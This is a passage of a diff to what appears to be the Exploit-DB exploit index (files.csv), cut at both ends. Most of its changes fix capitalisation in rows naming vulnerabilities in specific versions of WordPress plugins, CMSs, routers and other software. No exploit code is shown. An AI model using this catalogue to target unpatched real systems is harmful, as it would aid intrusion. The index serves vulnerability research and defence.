Privilege Escalation",2015-05-23,rebel,linux,local,0 37089,platforms/linux/local/37089.txt,"Fuse 2.9.3-15 - Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0 @@ -33482,42 +33485,42 @@ id,file,description,date,author,platform,type,port 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass / Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0 -37253,platforms/php/webapps/37253.txt,"Paypal Currency Converter Basic For Woocommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0 -37254,platforms/php/webapps/37254.txt,"Wordpress History Collection 1.1.1 Plugin - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 +37253,platforms/php/webapps/37253.txt,"Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0 +37254,platforms/php/webapps/37254.txt,"WordPress History Collection 1.1.1 Plugin - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0 37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0 37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0 -37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0 -37103,platforms/php/webapps/37103.txt,"concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 +37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery Component - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0 +37103,platforms/php/webapps/37103.txt,"Concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 -37106,platforms/php/webapps/37106.txt,"Wordpress Video Gallery Plugin 2.8 - Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80 -37107,platforms/php/webapps/37107.txt,"Wordpress NewStatPress Plugin 0.9.8 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 -37108,platforms/php/webapps/37108.txt,"Wordpress Landing Pages Plugin 1.8.4 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 -37109,platforms/php/webapps/37109.txt,"Wordpress GigPress Plugin 2.3.8 - SQL Injection",2015-05-26,"Adrián M. F.",php,webapps,80 -37110,platforms/java/webapps/37110.py,"Apache Jackrabbit - WebDAV XXE Exploit",2015-05-26,"Mikhail Egorov",java,webapps,8080 -37111,platforms/php/webapps/37111.txt,"Wordpress MailChimp Subscribe Forms 1.1 Plugin - Remote Code Execution",2015-05-26,woodspeed,php,webapps,80 -37112,platforms/php/webapps/37112.txt,"Wordpress church_admin Plugin 0.800 - Persistent Cross-Site Scripting",2015-05-26,woodspeed,php,webapps,80 +37106,platforms/php/webapps/37106.txt,"WordPress Video Gallery Plugin 2.8 - Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80 +37107,platforms/php/webapps/37107.txt,"WordPress NewStatPress Plugin 0.9.8 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 +37108,platforms/php/webapps/37108.txt,"WordPress Landing Pages Plugin 1.8.4 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 +37109,platforms/php/webapps/37109.txt,"WordPress GigPress Plugin 2.3.8 - SQL Injection",2015-05-26,"Adrián M. F.",php,webapps,80 +37110,platforms/java/webapps/37110.py,"Apache JackRabbit - WebDAV XXE Exploit",2015-05-26,"Mikhail Egorov",java,webapps,8080 +37111,platforms/php/webapps/37111.txt,"WordPress MailChimp Subscribe Forms 1.1 Plugin - Remote Code Execution",2015-05-26,woodspeed,php,webapps,80 +37112,platforms/php/webapps/37112.txt,"WordPress church_admin Plugin 0.800 - Persistent Cross-Site Scripting",2015-05-26,woodspeed,php,webapps,80 37113,platforms/php/webapps/37113.txt,"Wordpess Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80 37114,platforms/jsp/webapps/37114.txt,"Sendio ESP - Information Disclosure",2015-05-26,"Core Security",jsp,webapps,80 -37115,platforms/perl/webapps/37115.txt,"Clickheat 1.13+ - Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0 -37116,platforms/php/webapps/37116.py,"SilverStripe 2.4.7 - install.php PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0 +37115,platforms/perl/webapps/37115.txt,"ClickHeat 1.13+ - Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0 +37116,platforms/php/webapps/37116.py,"Silverstripe 2.4.7 - install.php PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0 37117,platforms/perl/webapps/37117.txt,"Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities",2012-04-29,"Chokri Ben Achor",perl,webapps,0 37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 - 'encode' Parameter Cross-Site Scripting",2012-04-27,farbodmahini,php,webapps,0 37119,platforms/asp/webapps/37119.txt,"XM Forum - 'id' Parameter Multiple SQL Injection",2012-04-27,"Farbod Mahini",asp,webapps,0 37120,platforms/php/webapps/37120.txt,"Uiga FanClub - 'p' Parameter SQL Injection",2012-04-27,"Farbod Mahini",php,webapps,0 37121,platforms/asp/webapps/37121.txt,"BBSXP CMS - Multiple SQL Injections",2012-04-27,"Farbod Mahini",asp,webapps,0 37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 - 'id' Parameter SQL Injection",2012-04-28,eidelweiss,php,webapps,0 -37123,platforms/php/webapps/37123.txt,"Wordpress WPsc MijnPress Plugin - 'rwflush' Parameter Cross-Site Scripting",2012-04-30,Am!r,php,webapps,0 +37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin - 'rwflush' Parameter Cross-Site Scripting",2012-04-30,Am!r,php,webapps,0 37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 - (Registration ID) Buffer Overflow (PoC)",2015-05-26,LiquidWorm,windows,dos,0 -37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 - restore.php filename Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 +37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 - restore.php Filename Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 - install.php language Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0 37127,platforms/php/webapps/37127.txt,"MySQLDumper 1.24.4 - install.php Multiple Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 37128,platforms/php/webapps/37128.txt,"MySQLDumper 1.24.4 - sql.php Multiple Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 37129,platforms/php/webapps/37129.txt,"MySQLDumper 1.24.4 - filemanagement.php f Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps,0 37130,platforms/php/webapps/37130.txt,"MySQLDumper 1.24.4 - Multiple Script Direct Request Information Disclosure",2012-04-27,AkaStep,php,webapps,0 37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 - main.php Multiple Function Cross-Site Request Forgery",2012-04-27,AkaStep,php,webapps,0 -37132,platforms/php/webapps/37132.txt,"Wordpress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting",2015-05-27,"Panagiotis Vagenas",php,webapps,80 +37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting",2015-05-27,"Panagiotis Vagenas",php,webapps,80 37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 - 'index.php' page Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 - 'menu.php' Remote PHP Code Execution",2012-04-27,AkaStep,php,webapps,0 37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A - Cross-Site Scripting",2012-05-02,"Usman Saeed",hardware,webapps,0 @@ -33539,60 +33542,60 @@ id,file,description,date,author,platform,type,port 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 37170,platforms/hardware/remote/37170.rb,"Airties - login-cgi Buffer Overflow",2015-06-01,Metasploit,hardware,remote,0 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 -37155,platforms/php/webapps/37155.txt,"Wordpress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting",2012-05-13,d3v1l,php,webapps,0 -37156,platforms/php/webapps/37156.txt,"GetSimple CMS 3.1 - admin/theme.php err Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0 -37157,platforms/php/webapps/37157.txt,"GetSimple CMS 3.1 - admin/pages.php error Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0 -37158,platforms/php/webapps/37158.txt,"GetSimple CMS 3.1 - admin/index.php Multiple Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0 -37159,platforms/php/webapps/37159.txt,"GetSimple CMS 3.1 - admin/upload.php path Parameter Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0 +37155,platforms/php/webapps/37155.txt,"WordPress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting",2012-05-13,d3v1l,php,webapps,0 +37156,platforms/php/webapps/37156.txt,"Getsimple CMS 3.1 - admin/theme.php err Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0 +37157,platforms/php/webapps/37157.txt,"Getsimple CMS 3.1 - admin/pages.php error Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0 +37158,platforms/php/webapps/37158.txt,"Getsimple CMS 3.1 - admin/index.php Multiple Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0 +37159,platforms/php/webapps/37159.txt,"Getsimple CMS 3.1 - admin/upload.php path Parameter Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0 37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 - 'uread.exe' Denial Of Service",2012-05-14,demonalex,windows,dos,0 -37161,platforms/php/webapps/37161.txt,"Wordpress GRAND Flash Album Gallery 1.71 Plugin - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37162,platforms/php/webapps/37162.txt,"Dynamic Widgets Wordpress Plugin 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37161,platforms/php/webapps/37161.txt,"WordPress GRAND Flash Album Gallery 1.71 Plugin - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37162,platforms/php/webapps/37162.txt,"Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0 37165,platforms/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Buffer Overflow (PoC)",2015-06-01,metacom,windows,remote,0 -37166,platforms/php/webapps/37166.php,"Wordpress dzs-zoomsounds Plugins 2.0 - Remote File Upload",2015-06-01,"nabil chris",php,webapps,0 +37166,platforms/php/webapps/37166.php,"WordPress dzs-zoomsounds Plugins 2.0 - Remote File Upload",2015-06-01,"nabil chris",php,webapps,0 37167,platforms/linux/local/37167.c,"PonyOS 3.0 - VFS Permissions Exploit",2015-06-01,"Hacker Fantastic",linux,local,0 37168,platforms/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0 37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution",2015-06-01,Metasploit,hardware,remote,0 37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager - Persistent Cross-Site Scripting",2015-06-01,"Cristiano Maruti",hardware,webapps,0 37173,platforms/php/webapps/37173.txt,"Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37174,platforms/php/webapps/37174.txt,"Wordpress Network Publisher 5.0.1 Plugin - 'networkpub_key' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37174,platforms/php/webapps/37174.txt,"WordPress Network Publisher 5.0.1 Plugin - 'networkpub_key' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37175,platforms/php/webapps/37175.txt,"Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37176,platforms/php/webapps/37176.txt,"PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37177,platforms/php/webapps/37177.txt,"CataBlog Wordpress Plugin 1.6 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37177,platforms/php/webapps/37177.txt,"CataBlog WordPress Plugin 1.6 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37178,platforms/php/webapps/37178.txt,"2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37180,platforms/php/webapps/37180.txt,"Wordpress Newsletter Manager Plugin 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37180,platforms/php/webapps/37180.txt,"WordPress NewsLetter Manager Plugin 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0 37185,platforms/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F - Remote Facebook Access Token Exploit",2015-06-03,"Jeremy Brown",hardware,webapps,0 -37182,platforms/php/webapps/37182.txt,"Wordpress LeagueManager 3.9.11 Plugin - SQL Injection",2015-06-02,javabudd,php,webapps,0 +37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQL Injection",2015-06-02,javabudd,php,webapps,0 37183,platforms/linux/local/37183.c,"PonyOS 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0 37187,platforms/windows/dos/37187.py,"Jildi FTP Client - Buffer Overflow (PoC)",2015-06-03,metacom,windows,dos,21 37188,platforms/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow",2015-06-03,Vulnerability-Lab,windows,dos,0 37189,platforms/php/webapps/37189.txt,"Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37190,platforms/php/webapps/37190.txt,"LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37191,platforms/php/webapps/37191.txt,"Leaflet Maps Marker Plugin 0.0.1 for Wordpress - leaflet_layer.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37192,platforms/php/webapps/37192.txt,"Leaflet Maps Marker Plugin 0.0.1 for Wordpress - leaflet_marker.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37191,platforms/php/webapps/37191.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress - leaflet_layer.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37192,platforms/php/webapps/37192.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress - leaflet_marker.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37193,platforms/php/webapps/37193.txt,"GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37194,platforms/php/webapps/37194.txt,"Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37195,platforms/php/webapps/37195.txt,"WP Forum Server Plugin 1.7.3 for Wordpress - fs-admin/fs-admin.php Multiple Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37196,platforms/php/webapps/37196.txt,"Pretty Link Lite Wordpress Plugin 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37195,platforms/php/webapps/37195.txt,"WP Forum Server Plugin 1.7.3 for WordPress - fs-admin/fs-admin.php Multiple Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37196,platforms/php/webapps/37196.txt,"Pretty Link Lite WordPress Plugin 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0 37199,platforms/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem - Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos,0 -37200,platforms/php/webapps/37200.txt,"Wordpress zM Ajax Login & Register Plugin 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80 -37201,platforms/php/webapps/37201.txt,"Wordpress Sharebar Plugin 1.2.1 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37200,platforms/php/webapps/37200.txt,"WordPress zM Ajax Login & Register Plugin 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80 +37201,platforms/php/webapps/37201.txt,"WordPress Sharebar Plugin 1.2.1 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37202,platforms/php/webapps/37202.txt,"Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37203,platforms/php/webapps/37203.txt,"Wordpress Soundcloud Is Gold 2.1 Plugin - 'width' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37204,platforms/php/webapps/37204.txt,"Wordpress Track That Stat 1.0.8 Plugin - Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37203,platforms/php/webapps/37203.txt,"WordPress Soundcloud Is Gold 2.1 Plugin - 'width' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37204,platforms/php/webapps/37204.txt,"WordPress Track That Stat 1.0.8 Plugin - Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37205,platforms/php/webapps/37205.txt,"LongTail JW Player - 'debug' Parameter Cross-Site Scripting",2012-05-16,gainover,php,webapps,0 37206,platforms/php/webapps/37206.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - demo/PHPThumb.demo.showpic.php title Parameter Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 37207,platforms/php/webapps/37207.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - demo/PHPThumb.demo.random.php dir Parameter Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 37208,platforms/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Parameter Cross-Site Scripting",2012-05-16,LiquidWorm,php,webapps,0 -37209,platforms/php/webapps/37209.txt,"Wordpress Really Simple Guest Post 1.0.6 Plugin - File Include",2015-06-05,Kuroi'SH,php,webapps,0 +37209,platforms/php/webapps/37209.txt,"WordPress Really Simple Guest Post 1.0.6 Plugin - File Include",2015-06-05,Kuroi'SH,php,webapps,0 37211,platforms/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0 37212,platforms/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0 37213,platforms/ios/webapps/37213.txt,"WiFi HD 8.1 - Directory Traversal / Denial of Service",2015-06-06,"Wh1t3Rh1n0 (Michael Allen)",ios,webapps,0 37214,platforms/hardware/webapps/37214.txt,"Broadlight Residential Gateway DI3124 - Unauthenticated Remote DNS Change",2015-06-06,"Todor Donev",hardware,webapps,0 -37252,platforms/php/webapps/37252.txt,"Wordpress RobotCPA Plugin V5 - Local File Inclusion",2015-06-10,T3N38R15,php,webapps,80 +37252,platforms/php/webapps/37252.txt,"WordPress RobotCPA Plugin V5 - Local File Inclusion",2015-06-10,T3N38R15,php,webapps,80 37216,platforms/php/webapps/37216.txt,"Unijimpe Captcha - 'captchademo.php' Cross-Site Scripting",2012-05-16,"Daniel Godoy",php,webapps,0 37217,platforms/php/webapps/37217.txt,"ArtiPHP 5.5.0 Neo - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",php,webapps,0 37218,platforms/jsp/dos/37218.txt,"Atlassian Tempo 6.4.3 / JIRA 5.0.0 / Gliffy 3.7.0 - XML Parsing Denial of Service",2012-05-17,anonymous,jsp,dos,0 @@ -33600,18 +33603,18 @@ id,file,description,date,author,platform,type,port 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 -37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 +37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp' path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0 -37226,platforms/php/webapps/37226.txt,"concrete5 FlashUploader - Arbitrary SWF File Upload",2012-05-20,AkaStep,php,webapps,0 -37227,platforms/php/webapps/37227.txt,"concrete5 - index.php/tools/required/files/replace searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 -37228,platforms/php/webapps/37228.txt,"concrete5 - index.php/tools/required/files/add_to searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 -37229,platforms/php/webapps/37229.txt,"concrete5 - index.php/tools/required/files/permissions searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 -37230,platforms/php/webapps/37230.txt,"concrete5 - index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 +37226,platforms/php/webapps/37226.txt,"Concrete5 FlashUploader - Arbitrary SWF File Upload",2012-05-20,AkaStep,php,webapps,0 +37227,platforms/php/webapps/37227.txt,"Concrete5 - index.php/tools/required/files/replace searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 +37228,platforms/php/webapps/37228.txt,"Concrete5 - index.php/tools/required/files/add_to searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 +37229,platforms/php/webapps/37229.txt,"Concrete5 - index.php/tools/required/files/Permissions searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 +37230,platforms/php/webapps/37230.txt,"Concrete5 - index.php/tools/required/Dashboard/sitemap_data.php Multiple Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 37350,platforms/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'index.php' id Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - admin.php Multiple Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 37352,platforms/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,php,webapps,0 -37353,platforms/php/webapps/37353.php,"Nmedia Wordpress Member Conversation Plugin 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",php,webapps,0 +37353,platforms/php/webapps/37353.php,"Nmedia WordPress Member Conversation Plugin 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",php,webapps,0 37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQL Injection",2015-06-09,Pancaker,php,webapps,0 37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 @@ -33619,11 +33622,11 @@ id,file,description,date,author,platform,type,port 37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC (2)",2015-06-08,"Pawel Wylecial",windows,dos,0 37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 -37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 Plugin - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80 -37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - Local File Inclusion",2015-06-08,"Ali Khalil",php,webapps,0 +37243,platforms/php/webapps/37243.txt,"WordPress Wp-ImageZoom 1.1.0 Plugin - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80 +37244,platforms/php/webapps/37244.txt,"WordPress Plugin 'WP Mobile Edition' - Local File Inclusion",2015-06-08,"Ali Khalil",php,webapps,0 37245,platforms/php/webapps/37245.txt,"Pasworld - detail.php Blind SQL Injection",2015-06-08,"Sebastian khan",php,webapps,0 37266,platforms/php/webapps/37266.txt,"ClickHeat 1.14 - Change Admin Password Cross-Site Request Forgery",2015-06-12,"David Shanahan",php,webapps,80 -37249,platforms/linux/dos/37249.py,"Libmimedir - .VCF Memory Corruption (PoC)",2015-06-10,"Jeremy Brown",linux,dos,0 +37249,platforms/linux/dos/37249.py,"Libmimedir - '.VCF' Memory Corruption (PoC)",2015-06-10,"Jeremy Brown",linux,dos,0 37250,platforms/xml/webapps/37250.txt,"HP WebInspect 10.4 - XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0 39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0 37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80 @@ -33635,7 +33638,7 @@ id,file,description,date,author,platform,type,port 37305,platforms/php/webapps/37305.txt,"Plogger Photo Gallery - SQL Injection",2012-05-22,"Eyup CELIK",php,webapps,0 37306,platforms/linux/dos/37306.txt,"Mosh - Remote Denial of Service",2012-05-22,"Timo Juhani Lindfors",linux,dos,0 37307,platforms/php/webapps/37307.txt,"PHPhq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0 -37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0 +37308,platforms/php/webapps/37308.txt,"Ruubikcms 